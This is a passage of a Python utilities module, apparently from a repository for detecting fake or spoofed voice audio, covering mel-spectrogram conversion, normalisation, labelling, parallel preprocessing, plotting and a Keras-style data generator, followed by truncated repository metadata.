_inv_mel_basis is None:\n _inv_mel_basis = np.linalg.pinv(_build_mel_basis(hparams))\n return np.maximum(1e-10, np.dot(_inv_mel_basis, mel_spectrogram))\n\n\ndef _mel_to_linear_tensorflow(mel_spectrogram, hparams):\n global _inv_mel_basis\n\n if _inv_mel_basis is None:\n _inv_mel_basis = np.linalg.pinv(_build_mel_basis(hparams))\n\n return tf.transpose(\n tf.maximum(1e-10, tf.matmul(\n tf.cast(_inv_mel_basis, tf.float32),\n tf.transpose(mel_spectrogram, [1, 0]))\n ), [1, 0]\n )\n\n\ndef _build_mel_basis(hparams):\n assert hparams.fmax <= hparams.sample_rate // 2\n return librosa.filters.mel(\n hparams.sample_rate, hparams.n_fft,\n n_mels=hparams.num_mels, fmin=hparams.fmin, fmax=hparams.fmax\n )\n\n\ndef _amp_to_db(x, hparams):\n min_level = np.exp(hparams.min_level_db / 20 * np.log(10))\n return 20 * np.log10(np.maximum(min_level, x))\n\n\ndef _db_to_amp(x):\n return np.power(10.0, x * 0.05)\n\n\ndef _db_to_amp_tensorflow(x):\n return tf.pow(tf.ones(tf.shape(x)) * 10.0, x * 0.05)\n\n\ndef _normalize(S, hparams):\n if hparams.allow_clipping_in_normalization:\n if hparams.symmetric_mels:\n return np.clip((2 * hparams.max_abs_value) * (\n (S - hparams.min_level_db) / (-hparams.min_level_db)\n ) - hparams.max_abs_value,\n -hparams.max_abs_value, hparams.max_abs_value\n )\n else:\n return np.clip(\n hparams.max_abs_value * (\n (S - hparams.min_level_db) / -hparams.min_level_db\n ), 0, hparams.max_abs_value\n )\n\n assert S.max() <= 0 and S.min() - hparams.min_level_db >= 0\n if hparams.symmetric_mels:\n return (2 * hparams.max_abs_value) * (\n (S - hparams.min_level_db) / (-hparams.min_level_db)\n ) - hparams.max_abs_value\n else:\n return hparams.max_abs_value * (\n (S - hparams.min_level_db) / (-hparams.min_level_db)\n )\n\n\ndef _denormalize(D, hparams):\n if hparams.allow_clipping_in_normalization:\n if hparams.symmetric_mels:\n clip_val = np.clip(\n D, -hparams.max_abs_value, hparams.max_abs_value\n )\n return hparams.min_level_db + (\n (clip_val + hparams.max_abs_value) *\n -hparams.min_level_db / (2 * hparams.max_abs_value)\n )\n else:\n return hparams.min_level_db + (\n np.clip(D, 0, hparams.max_abs_value) *\n -hparams.min_level_db / hparams.max_abs_value\n )\n\n if hparams.symmetric_mels:\n return ((\n (D + hparams.max_abs_value) *\n -hparams.min_level_db / (\n 2 * hparams.max_abs_value\n )) + hparams.min_level_db\n )\n else:\n return (\n (D * -hparams.min_level_db / hparams.max_abs_value) +\n hparams.min_level_db\n )\n\ndef _denormalize_tensorflow(D, hparams):\n if hparams.allow_clipping_in_normalization:\n if hparams.symmetric_mels:\n return hparams.min_level_db + (\n tf.clip_by_value(\n D, -hparams.max_abs_value, hparams.max_abs_value\n ) + hparams.max_abs_value\n ) * -hparams.min_level_db / (2 * hparams.max_abs_value)\n else:\n return (\n tf.clip_by_value(D, 0, hparams.max_abs_value) *\n -hparams.min_level_db / hparams.max_abs_value\n ) + hparams.min_level_db\n\n if hparams.symmetric_mels:\n return (\n (D + hparams.max_abs_value) *\n -hparams.min_level_db / (2 * hparams.max_abs_value)\n ) + hparams.min_level_db\n else:\n return (\n (D * -hparams.min_level_db / hparams.max_abs_value) +\n hparams.min_level_db\n )\n\n\n# given a path, return list of all files in directory\ndef get_list_of_wav_files(file_path):\n files = os.listdir(file_path)\n absolute_given_dir = os.path.abspath(file_path)\n\n absolute_files = list(map(\n lambda path:\n os.path.join(absolute_given_dir, path), files\n ))\n\n return absolute_files\n\n\ndef convert_to_flac(dir_path):\n for file_path in 
os.listdir(dir_path):\n if file_path.split('.')[-1] != \"flac\":\n read_file = AudioSegment.from_file(\n os.path.join(dir_path, file_path),\n file_path.split('.')[-1]\n )\n os.remove(os.path.join(dir_path, file_path))\n base_name = file_path.split('.')[:-1]\n # read_file = read_file.set_channels(8)\n # base_name = \".\".join(base_name)\n read_file.export(\n os.path.join(dir_path, f\"{base_name[0]}.flac\"),\n format=\"flac\"\n )\n\n\ndef get_target(file_path):\n if '/real/' in file_path:\n return 'real'\n elif '/fake/' in file_path:\n return 'fake'\n\n\ndef save_wav_to_npy(output_file, spectrogram):\n np.save(output_file, spectrogram)\n\n\ndef wav_to_mel(input_file, output_path):\n y, sr = librosa.load(input_file)\n filename = os.path.basename(input_file)\n target = get_target(input_file)\n\n output_file = '{}{}-{}'.format(\n output_path, filename.split('.')[0], target\n )\n\n mel_spec = librosa.feature.melspectrogram\n mel_spectrogram_of_audio = mel_spec(y=y, sr=sr).T\n save_wav_to_npy(output_file, mel_spectrogram_of_audio)\n\n\ndef convert_and_save(\n real_audio_files, output_real, fake_audio_files, output_fake\n):\n for file in real_audio_files:\n wav_to_mel(file, output_real)\n\n print(\n str(len(real_audio_files)) +\n ' real files converted to spectrogram'\n )\n\n for file in fake_audio_files:\n wav_to_mel(file, output_fake)\n\n print(\n str(len(fake_audio_files)) +\n ' fake files converted to spectrogram'\n )\n\n\ndef split_title_line(title_text, max_words=5):\n \"\"\"\n A function that splits any string based on specific character\n (returning it with the string), with maximum number of words on it\n \"\"\"\n seq = title_text.split()\n return '\\n'.join([\n ' '.join(seq[i:i + max_words])\n for i in range(0, len(seq), max_words)\n ])\n\n\ndef plot_spectrogram(\n pred_spectrogram, path, title=None, split_title=False,\n target_spectrogram=None, max_len=None, auto_aspect=False\n):\n if max_len is not None:\n target_spectrogram = target_spectrogram[:max_len]\n pred_spectrogram = pred_spectrogram[:max_len]\n\n if split_title:\n title = split_title_line(title)\n\n fig = plt.figure(figsize=(10, 8))\n # Set common labels\n fig.text(\n 0.5, 0.18, title,\n horizontalalignment='center', fontsize=16\n )\n\n # target spectrogram subplot\n if target_spectrogram is not None:\n ax1 = fig.add_subplot(311)\n ax2 = fig.add_subplot(312)\n\n if auto_aspect:\n im = ax1.imshow(\n np.rot90(target_spectrogram), aspect='auto',\n interpolation='none'\n )\n else:\n im = ax1.imshow(\n np.rot90(target_spectrogram),\n interpolation='none'\n )\n\n ax1.set_title('Target Mel-Spectrogram')\n fig.colorbar(\n mappable=im, shrink=0.65,\n orientation='horizontal', ax=ax1\n )\n\n ax2.set_title('Predicted Mel-Spectrogram')\n else:\n ax2 = fig.add_subplot(211)\n\n if auto_aspect:\n im = ax2.imshow(\n np.rot90(pred_spectrogram), aspect='auto',\n interpolation='none'\n )\n else:\n im = ax2.imshow(\n np.rot90(pred_spectrogram),\n interpolation='none'\n )\n\n fig.colorbar(\n mappable=im, shrink=0.65,\n orientation='horizontal', ax=ax2\n )\n\n plt.tight_layout()\n plt.savefig(path, format='png')\n plt.close()\n\n\ndef process_audio_files(filename, dirpath):\n audio_array, sample_rate = librosa.load(\n os.path.join(dirpath, 'flac', filename), sr=16000\n )\n trim_audio_array, index = librosa.effects.trim(audio_array)\n mel_spec_array = melspectrogram(\n trim_audio_array, hparams=hparams\n ).T\n\n \"\"\"\n mel_spec_array = librosa.feature.melspectrogram(\n y=trim_audio_array, sr=sample_rate, \n n_mels=model_params['num_freq_bin'\n 
]).T\n \"\"\"\n\n label_name = filename.split('_')[-1].split('.')[0]\n if (label_name == 'bonafide') or ('target' in label_name):\n label = 1\n elif label_name == 'spoof':\n label = 0\n else:\n label = None\n if label is None:\n print(f\"Removing {filename} since it does not have label\")\n os.remove(os.path.join(dirpath, 'flac', filename))\n\n return mel_spec_array, label\n\ndef convert_audio_to_processed_list(\n input_audio_array_list, filename, dirpath\n):\n label_name = filename.split('_')[-1].split('.')[0]\n out_list = []\n\n if label_name == 'spoof':\n audio_array_list = [input_audio_array_list[0]]\n choose_random_one_ind = np.random.choice(\n np.arange(1, len(input_audio_array_list))\n )\n audio_array_list.append(\n input_audio_array_list[choose_random_one_ind]\n )\n label = 0\n\n elif (label_name == 'bonafide') or ('target' in label_name):\n audio_array_list = input_audio_array_list\n label = 1\n else:\n audio_array_list = [input_audio_array_list[0]]\n label = None\n\n for audio_array in audio_array_list:\n trim_audio_array, index = librosa.effects.trim(audio_array)\n mel_spec_array = melspectrogram(\n trim_audio_array, hparams=hparams\n ).T\n\n \"\"\"\n mel_spec_array = librosa.feature.melspectrogram(\n y=trim_audio_array, sr=sample_rate, \n n_mels=model_params['num_freq_bin']\n ).T\n \"\"\"\n\n if label is None:\n print(f\"Removing {filename} since it does not have label\")\n os.remove(os.path.join(dirpath, 'flac', filename))\n\n out_list.append([mel_spec_array, label])\n\n return out_list\n\n\ndef preprocess_and_save_audio_from_ray_parallel(\n dirpath, mode, recompute=False, dir_num=None, isaug=False\n):\n if isaug:\n preproc_filename = f'{mode}_preproc_aug.npy'\n else:\n preproc_filename = f'{mode}_preproc.npy'\n\n # if mode != 'train':\n # preproc_filename = f'{mode}_preproc.npy'\n\n if dir_num is not None:\n base_path = base_data_path[dir_num]\n else:\n base_path = base_data_path[0]\n\n is_file = os.path.isfile(os.path.join(\n f'{base_path}/preprocessed_data', preproc_filename\n ))\n\n if not is_file or recompute:\n filenames = os.listdir(os.path.join(dirpath, 'flac'))\n num_cores = multiprocessing.cpu_count() - 1\n\n if isaug:\n precproc_list_saved = Parallel(n_jobs=num_cores)(\n delayed(process_audio_files_with_aug)(\n filename, dirpath\n ) for filename in tqdm(filenames)\n )\n\n # Flatten the list\n print(\n f\"******original len of preproc_list:\",\n len(precproc_list_saved)\n )\n precproc_list = []\n for i in range(len(precproc_list_saved)):\n precproc_list.extend(precproc_list_saved[i])\n\n \"\"\"\n precproc_list = [\n item for sublist in precproc_list\n for item in sublist\n ]\n \"\"\"\n print(\n f\"******flattened len of preproc_list:\",\n len(precproc_list)\n )\n else:\n precproc_list = Parallel(n_jobs=num_cores)(\n delayed(process_audio_files)(filename, dirpath)\n for filename in tqdm(filenames)\n )\n\n precproc_list = [x for x in precproc_list if x[1] is not None]\n\n if not os.path.isdir(f'{base_path}/preprocessed_data'):\n os.mkdir(f'{base_path}/preprocessed_data')\n\n np.save(os.path.join(\n f'{base_path}/preprocessed_data', preproc_filename\n ), precproc_list)\n else:\n print(\"Preprocessing already done!\")\n\ndef process(*args, **kwargs):\n return process_audio_files_inference(*args, **kwargs)\n\ndef load_melspectrogram(path, is_raw_audio=False):\n if is_raw_audio:\n audio_array = path\n else:\n audio_array, sample_rate = librosa.load(path, sr=16000)\n\n trim_audio_array, index = librosa.effects.trim(audio_array)\n mel_spec_array = melspectrogram(\n 
trim_audio_array, hparams=hparams\n ).T\n\n return mel_spec_array\n\ndef process_audio_files_inference(\n filename, dirpath, mode, normalize=False\n):\n if type(filename) is tuple:\n filename = os.path.join(*filename)\n elif type(filename) == np.ndarray:\n filename = os.path.join(*filename)\n\n path = os.path.join(dirpath, filename)\n mel_spec_array = load_melspectrogram(path)\n\n # https://stackoverflow.com/questions/57072513/\n duration = get_duration(filename)\n\n if mode == 'unlabeled':\n return mel_spec_array\n elif mode == 'real':\n label = 0\n elif mode == 'fake':\n label = 1\n elif mode in (0, 1):\n label = mode\n else:\n raise ValueError(f'BAD MODE {mode}')\n\n return mel_spec_array, label, duration\n\n\ndef get_durations(filenames, dirpath='', show_pbar=True):\n if show_pbar:\n iterable = tqdm(range(len(filenames)))\n else:\n iterable = range(len(filenames))\n\n durations = []\n for k in iterable:\n filename = filenames[k]\n if show_pbar:\n iterable.set_description(str(filename))\n\n duration = get_duration(filename, dirpath)\n durations.append(duration)\n\n return durations\n\n\ndef get_duration(filename, dirpath=''):\n if type(filename) is tuple:\n filename = os.path.join(*filename)\n\n file_path = os.path.join(dirpath, filename)\n file = sf.SoundFile(file_path)\n duration = file.frames / file.samplerate\n return duration\n\ndef get_frames(filename, dirpath=''):\n if type(filename) is tuple:\n filename = os.path.join(*filename)\n\n file_path = os.path.join(dirpath, filename)\n file = sf.SoundFile(file_path)\n frames = file.frames\n return frames\n\n\ndef preprocess_from_filenames(\n filenames, dirpath, mode, use_parallel=True,\n show_pbar=True, num_cores=None, func=process,\n cache=None, cache_threshold=30, normalize=False\n):\n if show_pbar:\n iterable = tqdm(range(len(filenames)))\n else:\n iterable = range(len(filenames))\n\n if num_cores is None:\n num_cores = multiprocessing.cpu_count()\n\n arg_list = []\n cache_list = []\n\n if use_parallel:\n process_list = []\n\n for k in iterable:\n filename = filenames[k]\n if type(filename) is tuple:\n filename = os.path.join(*filename)\n\n if type(mode) is dict:\n file_mode = mode[filename]\n elif type(mode) in (list, tuple):\n assert len(mode) == len(filenames)\n file_mode = mode[k]\n else:\n file_mode = mode\n\n delayed_func = delayed(func)\n args = (filename, dirpath, file_mode, normalize)\n\n if args in cache:\n data = cache[args]\n cache_list.append(data)\n continue\n\n process = delayed_func(*args)\n process_list.append(process)\n arg_list.append(args)\n\n preproc_list = Parallel(n_jobs=num_cores)(process_list)\n\n else:\n preproc_list = []\n for k in iterable:\n filename = filenames[k]\n\n if type(mode) is dict:\n file_mode = mode[filename]\n elif type(mode) in (list, tuple):\n assert len(mode) == len(filenames)\n file_mode = mode[k]\n else:\n file_mode = mode\n\n args = (filename, dirpath, file_mode, normalize)\n if args in cache:\n data = self.cache[args]\n preproc_list.append(data)\n continue\n\n preproc_list.append(func(*args))\n arg_list.append(args)\n\n durations = []\n for k, data in enumerate(preproc_list):\n mel_spec_array, label, duration = data\n durations.append(duration)\n args = arg_list[k]\n\n if (duration > cache_threshold) and (args not in cache):\n cache[args] = data\n\n # print('MAX DURATIONS', max(durations))\n preproc_list.extend(cache_list)\n return preproc_list\n\n\ndef preprocess_parallel(*args, **kwargs):\n return preprocess_from_ray_parallel_inference(*args, **kwargs)\n\ndef 
preprocess_from_ray_parallel_inference(\n dirpath, mode, use_parallel=True\n):\n filenames = os.listdir(os.path.join(dirpath, mode))\n return preprocess_from_filenames(\n filenames=filenames, dirpath=dirpath, mode=mode,\n use_parallel=use_parallel\n )\n\n\ndef preprocess_and_save_audio_from_ray(dirpath, mode, recompute=False):\n filenames = os.listdir(os.path.join(dirpath, 'flac'))\n is_file = os.path.isfile(os.path.join(\n f'{base_data_path}/preprocessed_data', f'{mode}_preproc.npy'\n ))\n\n if not is_file or recompute:\n precproc_list = []\n\n for filename in tqdm(filenames):\n audio_array, sample_rate = librosa.load(os.path.join(\n dirpath, 'flac', filename\n ), sr=16000)\n\n trim_audio_array, index = librosa.effects.trim(audio_array)\n mel_spec_array = melspectrogram(\n trim_audio_array, hparams=hparams\n ).T\n\n \"\"\"\n mel_spec_array = librosa.feature.melspectrogram(\n y=trim_audio_array, sr=sample_rate, \n n_mels=model_params['num_freq_bin']\n ).T\n \"\"\"\n label_name = filename.split('_')[-1].split('.')[0]\n if label_name == 'bonafide':\n label = 1\n elif label_name == 'spoof':\n label = 0\n else:\n label = None\n if label is not None:\n precproc_list.append((mel_spec_array, label))\n if label is None:\n print(\n f\"Removing {filename} since it does not have label\"\n )\n os.remove(os.path.join(dirpath, 'flac', filename))\n\n if not os.path.isdir(f'{base_data_path}/preprocessed_data'):\n os.mkdir(f'{base_data_path}/preprocessed_data')\n\n np.save(os.path.join(\n f'{base_data_path}/preprocessed_data', f'{mode}_preproc.npy'\n ), precproc_list)\n\n \"\"\"\n np.save(os.path.join(\n dirpath, 'preproc', 'preproc.npy'\n ), precproc_list)\n \"\"\"\n else:\n print(\"Preprocessing already done!\")\n\n\ndef preprocess_and_save_audio(dirpath, recompute=False):\n filenames = os.listdir(os.path.join(dirpath, 'flac'))\n is_file = os.path.isfile(os.path.join(\n dirpath, 'preproc', 'preproc.npy'\n ))\n\n if not is_file or recompute:\n precproc_list = []\n\n for filename in tqdm(filenames):\n audio_array, sample_rate = librosa.load(os.path.join(\n dirpath, 'flac', filename\n ), sr=16000)\n\n trim_audio_array, index = librosa.effects.trim(audio_array)\n mel_spec_array = librosa.feature.melspectrogram(\n y=trim_audio_array, sr=sample_rate,\n n_mels=model_params['num_freq_bin']\n ).T\n\n label_name = filename.split('_')[-1].split('.')[0]\n\n if label_name == 'bonafide':\n label = 1\n elif label_name == 'spoof':\n label = 0\n else:\n label = None\n\n if label is not None:\n precproc_list.append((mel_spec_array, label))\n if label is None:\n print(\n f\"Removing {filename} since it does not have label\"\n )\n os.remove(os.path.join(dirpath, 'flac', filename))\n\n if not os.path.isdir(os.path.join(dirpath, 'preproc')):\n os.mkdir(os.path.join(dirpath, 'preproc'))\n\n np.save(os.path.join(\n dirpath, 'preproc', 'preproc.npy'\n ), precproc_list)\n else:\n print(\"Preprocessing already done!\")\n\n\ndef describe_array(arr):\n print(\n f\"Mean duration: {arr.mean()}\" +\n \"\\nStandard Deviation: {arr.std()}\" +\n \"\\nNumber of Clips: {len(arr)}\"\n )\n plt.hist(arr, bins=40)\n plt.show()\n\n\ndef get_durations_from_dir(audio_dir, file_extension='.wav'):\n durations = list()\n\n for root, dirs, filenames in os.walk(audio_dir):\n for file_name in filenames:\n if file_extension in file_name:\n file_path = os.path.join(root, file_name)\n audio = AudioSegment.from_wav(file_path)\n duration = audio.duration_seconds\n durations.append(duration)\n\n return np.array(durations)\n\n\ndef get_zero_pad(batch_input):\n 
# find max length\n max_length = np.max([len(x) for x in batch_input])\n\n for i, arr in enumerate(batch_input):\n curr_length = len(arr)\n pad_length = max_length - curr_length\n\n if len(arr.shape) > 1:\n arr = np.concatenate([\n arr, np.zeros((pad_length, arr.shape[-1]))\n ])\n else:\n arr = np.concatenate([arr, np.zeros(pad_length)])\n\n batch_input[i] = arr\n\n return batch_input\n\n\ndef truncate_array(batch_input):\n min_arr_len = np.min([len(x) for x in batch_input])\n for i, arr in enumerate(batch_input):\n batch_input[i] = arr[:min_arr_len]\n return batch_input\n\n\ndef random_truncate_array(batch_input):\n min_arr_len = np.min([len(x) for x in batch_input])\n\n for i, arr in enumerate(batch_input):\n upper_limit_start_point = len(arr) - min_arr_len\n\n if upper_limit_start_point > 0:\n start_point = np.random.randint(0, upper_limit_start_point)\n else:\n start_point = 0\n\n batch_input[i] = arr[start_point:(start_point + min_arr_len)]\n\n return batch_input\n\n\nclass f1_score_callback(object):\n def __init__(\n self, x_val_inp, y_val_inp, model_save_filename=None,\n save_model=True\n ):\n self.x_val = x_val_inp\n self.y_val = y_val_inp\n self.model_save_filename = model_save_filename\n self.save_model = save_model\n self._val_f1 = 0\n\n self.f1_score_value = None\n\n def on_train_begin(self, logs=None):\n self.f1_score_value = []\n\n def on_epoch_end(self, epoch, logs=None):\n y_val = self.y_val\n datagen_val = DataGenerator(self.x_val, mode='test')\n y_pred = self.model.predict_generator(\n datagen_val, use_multiprocessing=False, max_queue_size=50\n )\n y_pred_labels = np.zeros((len(y_pred)))\n y_pred_labels[y_pred.flatten() > 0.5] = 1\n\n self._val_f1 = f1_score(y_val, y_pred_labels.astype(int))\n print(f\"val_f1: {self._val_f1:.4f}\")\n self.f1_score_value.append(self._val_f1)\n\n if self.save_model:\n if self._val_f1 >= max(self.f1_score_value):\n print(\"F1 score has improved. 
Saving model.\")\n self.model.save(self.model_save_filename)\n\n try:\n foundations.log_metric('epoch_val_f1_score', self._val_f1)\n foundations.log_metric(\n 'best_f1_score', max(self.f1_score_value)\n )\n except Exception as e:\n print(e)\n\n return\n\n\nclass DataGenerator(object):\n def __init__(\n self, x_set, y_set=None, sample_weights=None,\n batch_size=model_params['batch_size'], shuffle=False,\n mode='train'\n ):\n self.x, self.y = x_set, y_set\n self.batch_size = batch_size\n self.shuffle = shuffle\n self.mode = mode\n self.sample_weights = sample_weights\n\n if self.mode != 'train':\n self.shuffle = False\n\n self.n = 0\n self.max = self.__len__()\n\n def __len__(self):\n return int(np.ceil(len(self.x) / float(self.batch_size)))\n\n def __getitem__(self, idx):\n batch_x = self.x[\n idx * self.batch_size:(idx + 1) * self.batch_size\n ]\n batch_x = get_zero_pad(batch_x)\n # batch_x = random_truncate_array(batch_x)\n batch_x = np.array(batch_x)\n batch_x = batch_x.reshape((len(batch_x), -1, hparams.num_mels))\n\n if self.mode != 'test':\n batch_y = self.y[\n idx * self.batch_size:(idx + 1) * self.batch_size\n ]\n\n # read your data here using the batch lists,\n # batch_x and batch_y\n\n if self.mode == 'train':\n return np.array(batch_x), np.array(batch_y)\n if self.mode == 'val':\n return np.array(batch_x), np.array(batch_y)\n else:\n return np.array(batch_x)\n\n def __next__(self):\n if self.n >= self.max:\n self.n = 0\n\n result = self.__getitem__(self.n)\n self.n += 1\n return result\n", "repo_name": "milselarch/AISG", "sub_path": "FakeVoiceTorch/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 35619, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.random.seed", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 30, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 32, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 32, "usage_type": "attribute"}, {"api_name": "matplotlib.use", "line_number": 34, "usage_type": "call"}, {"api_name": "librosa.display.core.load", "line_number": 43, "usage_type": "call"}, {"api_name": "librosa.display.core", "line_number": 43, "usage_type": "attribute"}, {"api_name": "librosa.display", "line_number": 43, "usage_type": "name"}, {"api_name": "numpy.max", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 47, "usage_type": "call"}, {"api_name": "scipy.io.wavfile.write", "line_number": 49, "usage_type": "call"}, {"api_name": "scipy.io.wavfile", "line_number": 49, "usage_type": "name"}, {"api_name": "numpy.int16", "line_number": 49, "usage_type": "attribute"}, {"api_name": "numpy.max", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 54, "usage_type": "call"}, {"api_name": "scipy.io.wavfile.write", "line_number": 55, "usage_type": "call"}, {"api_name": "scipy.io.wavfile", "line_number": 55, "usage_type": "name"}, {"api_name": "numpy.int16", "line_number": 55, "usage_type": "attribute"}, {"api_name": "scipy.signal.lfilter", "line_number": 60, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 60, "usage_type": "name"}, {"api_name": "scipy.signal.lfilter", "line_number": 66, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 66, "usage_type": "name"}, {"api_name": "librosa.display.effects.trim", "line_number": 99, "usage_type": "call"}, {"api_name": 
"librosa.display.effects", "line_number": 99, "usage_type": "attribute"}, {"api_name": "librosa.display", "line_number": 99, "usage_type": "name"}, {"api_name": "numpy.abs", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 158, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 160, "usage_type": "attribute"}, {"api_name": "numpy.float64", "line_number": 189, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 191, "usage_type": "attribute"}, {"api_name": "lws.lws", "line_number": 256, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 266, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 266, "usage_type": "attribute"}, {"api_name": "numpy.random.rand", "line_number": 266, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 266, "usage_type": "attribute"}, {"api_name": "numpy.abs", "line_number": 267, "usage_type": "call"}, {"api_name": "numpy.complex", "line_number": 267, "usage_type": "attribute"}, {"api_name": "numpy.exp", "line_number": 271, "usage_type": "call"}, {"api_name": "numpy.angle", "line_number": 271, "usage_type": "call"}, {"api_name": "librosa.display.stft", "line_number": 314, "usage_type": "call"}, {"api_name": "librosa.display", "line_number": 314, "usage_type": "name"}, {"api_name": "librosa.display.istft", "line_number": 323, "usage_type": "call"}, {"api_name": "librosa.display", "line_number": 323, "usage_type": "name"}, {"api_name": "numpy.dot", "line_number": 379, "usage_type": "call"}, {"api_name": "numpy.linalg.pinv", "line_number": 385, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 385, "usage_type": "attribute"}, {"api_name": "numpy.maximum", "line_number": 386, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 386, "usage_type": "call"}, {"api_name": "numpy.linalg.pinv", "line_number": 393, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 393, "usage_type": "attribute"}, {"api_name": "librosa.display.filters.mel", "line_number": 405, "usage_type": "call"}, {"api_name": "librosa.display.filters", "line_number": 405, "usage_type": "attribute"}, {"api_name": "librosa.display", "line_number": 405, "usage_type": "name"}, {"api_name": "numpy.exp", "line_number": 412, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 412, "usage_type": "call"}, {"api_name": "numpy.log10", "line_number": 413, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 413, "usage_type": "call"}, {"api_name": "numpy.power", "line_number": 417, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 427, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 433, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 453, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 462, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 507, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 508, "usage_type": "call"}, {"api_name": "os.path", "line_number": 508, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 512, "usage_type": "call"}, {"api_name": "os.path", "line_number": 512, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 519, "usage_type": "call"}, {"api_name": "pydub.AudioSegment.from_file", "line_number": 521, "usage_type": "call"}, {"api_name": "pydub.AudioSegment", "line_number": 521, "usage_type": 
"name"}, {"api_name": "os.path.join", "line_number": 522, "usage_type": "call"}, {"api_name": "os.path", "line_number": 522, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 525, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 525, "usage_type": "call"}, {"api_name": "os.path", "line_number": 525, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 530, "usage_type": "call"}, {"api_name": "os.path", "line_number": 530, "usage_type": "attribute"}, {"api_name": "numpy.save", "line_number": 543, "usage_type": "call"}, {"api_name": "librosa.display.load", "line_number": 547, "usage_type": "call"}, {"api_name": "librosa.display", "line_number": 547, "usage_type": "name"}, {"api_name": "os.path.basename", "line_number": 548, "usage_type": "call"}, {"api_name": "os.path", "line_number": 548, "usage_type": "attribute"}, {"api_name": "librosa.display.feature", "line_number": 555, "usage_type": "attribute"}, {"api_name": "librosa.display", "line_number": 555, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 603, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 603, "usage_type": "name"}, {"api_name": "numpy.rot90", "line_number": 617, "usage_type": "call"}, {"api_name": "numpy.rot90", "line_number": 622, "usage_type": "call"}, {"api_name": "numpy.rot90", "line_number": 638, "usage_type": "call"}, {"api_name": "numpy.rot90", "line_number": 643, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 652, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 652, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 653, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 653, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 654, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 654, "usage_type": "name"}, {"api_name": "librosa.display.load", "line_number": 658, "usage_type": "call"}, {"api_name": "librosa.display", "line_number": 658, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 659, "usage_type": "call"}, {"api_name": "os.path", "line_number": 659, "usage_type": "attribute"}, {"api_name": "librosa.display.effects.trim", "line_number": 661, "usage_type": "call"}, {"api_name": "librosa.display.effects", "line_number": 661, "usage_type": "attribute"}, {"api_name": "librosa.display", "line_number": 661, "usage_type": "name"}, {"api_name": "os.remove", "line_number": 682, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 682, "usage_type": "call"}, {"api_name": "os.path", "line_number": 682, "usage_type": "attribute"}, {"api_name": "numpy.random.choice", "line_number": 694, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 694, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 695, "usage_type": "call"}, {"api_name": "librosa.display.effects.trim", "line_number": 710, "usage_type": "call"}, {"api_name": "librosa.display.effects", "line_number": 710, "usage_type": "attribute"}, {"api_name": "librosa.display", "line_number": 710, "usage_type": "name"}, {"api_name": "os.remove", "line_number": 724, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 724, "usage_type": "call"}, {"api_name": "os.path", "line_number": 724, "usage_type": "attribute"}, {"api_name": "constants.base_data_path", "line_number": 743, "usage_type": "name"}, {"api_name": 
"constants.base_data_path", "line_number": 745, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 747, "usage_type": "call"}, {"api_name": "os.path", "line_number": 747, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 747, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 752, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 752, "usage_type": "call"}, {"api_name": "os.path", "line_number": 752, "usage_type": "attribute"}, {"api_name": "multiprocessing.cpu_count", "line_number": 753, "usage_type": "call"}, {"api_name": "joblib.Parallel", "line_number": 756, "usage_type": "call"}, {"api_name": "joblib.delayed", "line_number": 757, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 759, "usage_type": "call"}, {"api_name": "joblib.Parallel", "line_number": 782, "usage_type": "call"}, {"api_name": "joblib.delayed", "line_number": 783, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 784, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 789, "usage_type": "call"}, {"api_name": "os.path", "line_number": 789, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 790, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 792, 